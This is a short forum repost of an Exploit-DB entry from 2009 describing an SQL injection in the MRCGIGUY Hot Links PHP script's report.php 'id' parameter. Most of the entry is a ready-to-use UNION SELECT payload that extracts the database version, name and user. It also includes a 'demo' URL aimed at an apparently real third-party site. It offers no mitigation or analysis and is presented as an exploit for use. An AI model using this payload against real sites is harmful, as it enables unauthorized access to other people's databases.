Exploit MRCGIGUY Hot Links - 'report.php?id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8918
Проверка EDB
  1. Пройдено
Автор
THE G0BL!N
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-06-09
Код:
MRCGIGUY Hot Links SQL (PHP) (report.php id) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://www.mrcgiguy.com
Special Thx:  All Muslims All Members Of Team Algerien Of FootBall
Note: Algerie 3-1 Egypt
Exploit:
------
SQL INJECTION:
-------------
http://wwww.victim.com/report.php?id=[SQL CODE]
[ SQL CODE]=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--
Demo:
----
http://www.myhotlinks.net/hlphpsql/report.php?id=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--

# milw0rm.com [2009-06-09]
 
Источник
www.exploit-db.com

Похожие темы